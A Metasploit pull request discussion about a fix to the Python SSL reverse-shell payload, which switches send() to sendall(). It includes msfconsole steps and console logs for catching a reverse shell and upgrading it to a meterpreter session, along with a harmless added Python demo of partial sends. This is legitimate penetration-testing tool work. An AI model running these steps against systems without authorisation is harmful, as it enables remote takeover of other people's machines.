Fixed python reverse shell ssl send for EOF occurred in violation of … #6897

Merged
merged 2 commits into from May 21, 2016

geckom commented May 20, 2016

Fixes "ssl.SSLEOFError: EOF occurred in violation of protocol" when trying to upgrade a python/shell_reverse_tcp_ssl payload.

Updated "send" function to "sendall" - Unlike send(), this method continues to send data from string until either all data has been sent or an error occurs.

Verification

Tested meterpreter upgrade of shell and normal shell commands.

  • Start msfconsole
  • use exploit/multi/handler
  • set PAYLOAD=python/shell_reverse_tcp_ssl
  • exploit -j -z
    Command shell session 192 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000
  • sessions
    192 shell python 4.3.2.1:54321 -> 1.2.3.4:12345
  • sessions -i 192
  • ls /tmp
    mysql.sock
    Background session 192? [y/N] y
  • sessions -u 192
    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [192]
    [*] Upgrading session ID: 192
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 4.3.2.1:54321
    [*] Starting the payload handler...
    [*] Sending stage (38526 bytes) to 1.2.3.4
    [*] Meterpreter session 194 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000
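
The send()/sendall() contract the description relies on, as an added example that is not part of the pull request or the Metasploit code: over a local socket pair, one `send()` call accepts only part of a large buffer, while `sendall()` or an explicit retry loop delivers all of it. It assumes plain sockets rather than SSL so that it runs offline, and the helper names are hypothetical.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

PAYLOAD = b"A" * (8 * 1024 * 1024)  # constructed sample, larger than default socket buffers


def drain(sock):
    """Read until the peer closes; return how many bytes arrived."""
    received = 0
    while True:
        chunk = sock.recv(65536)
        if not chunk:
            return received
        received += len(chunk)


def send_once(data):
    """Call send() once with nobody reading, close, then count what the peer got."""
    a, b = socket.socketpair()
    with a, b:
        a.settimeout(2.0)        # timeout mode: send() does one write and returns
        accepted = a.send(data)  # only what fits in the kernel buffer is accepted
        a.close()                # the unsent remainder is never transmitted
        return accepted, drain(b)


def send_loop(sock, data):
    """What sendall() does for the caller: retry until every byte is written."""
    view = memoryview(data)
    while len(view):
        view = view[sock.send(view):]


def deliver(sender, data):
    """Run sender(sock, data) against a reading peer; return bytes received."""
    a, b = socket.socketpair()
    with ThreadPoolExecutor(1) as pool, b, a:  # on exit a closes first, so the reader sees EOF
        peer = pool.submit(drain, b)
        a.settimeout(10.0)
        sender(a, data)
        a.close()
        return peer.result()


if __name__ == "__main__":
    accepted, got = send_once(PAYLOAD)
    print("send():    accepted %d of %d, peer got %d" % (accepted, len(PAYLOAD), got))
    print("sendall(): peer got %d" % deliver(socket.socket.sendall, PAYLOAD))
    print("loop:      peer got %d" % deliver(send_loop, PAYLOAD))
```

Code that calls `send()` and ignores the return value silently drops everything past the first partial write, which is the gap `sendall()` closes.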

@zeroSteiner zeroSteiner self-assigned this May 20, 2016

sempervictus commented May 20, 2016

Thank you, testing now.

zeroSteiner commented May 21, 2016

So fun fact about this error is that I'm able to reproduce it reliably by simply trying to interact with the shell on my system. That is to say that without even trying to upgrade the shell to a meterpreter session as outlined in the description, it is dying with the following error:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 12, in <module>
  File "/usr/lib64/python2.7/ssl.py", line 687, in send
    v = self._sslobj.write(data)
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:1646)

Python version 2.7.11 on Linux x64

zeroSteiner commented May 21, 2016

Was able to confirm that this addresses the EOF error and there are no apparent version restrictions on Python's sendall function. Thanks @geckom, I'll have this landed in just a minute.

msf (S:1 J:0) exploit(handler) > sessions -u 1 
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] [2016.05.21-16:44:51] Upgrading session ID: 1
[*] [2016.05.21-16:44:52] Platform: Linux
[*] [2016.05.21-16:44:52] Upgrade payload: linux/x86/meterpreter/reverse_tcp
[*] [2016.05.21-16:44:52] Starting exploit/multi/handler
[*] [2016.05.21-16:44:52] Started reverse TCP handler on 192.168.90.1:4433 
[*] [2016.05.21-16:44:52] Starting the payload handler...
[*] [2016.05.21-16:44:57] Transfer method: Bourne shell [fallback]
[*] [2016.05.21-16:44:57] Starting transfer...
[*] [2016.05.21-16:44:57] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] [2016.05.21-16:44:59] Sending stage (1495599 bytes) to 192.168.90.1
[*] [2016.05.21-16:44:59] Command stager progress: 100.00% (668/668 bytes)
[*] [2016.05.21-16:44:59] Cleaning up handler
msf (S:1 J:1) exploit(handler) > [*] Meterpreter session 2 opened (192.168.90.1:4433 -> 192.168.90.1:57092) at 2016-05-21 16:45:01 -0400

msf (S:2 J:0) exploit(handler) > 
msf (S:2 J:0) exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   shell python                                                                                             192.168.90.1:4444 -> 192.168.90.1:48008 (192.168.90.1)
  2   meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ localhost.lo...  192.168.90.1:4433 -> 192.168.90.1:57092 (192.168.90.1)

msf (S:2 J:0) exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter >

@zeroSteiner zeroSteiner merged commit a71e853 into rapid7:master May 21, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

zeroSteiner added a commit that referenced this pull request May 21, 2016

OJ commented May 21, 2016

Nice job. Thanks @geckom for the contribution!
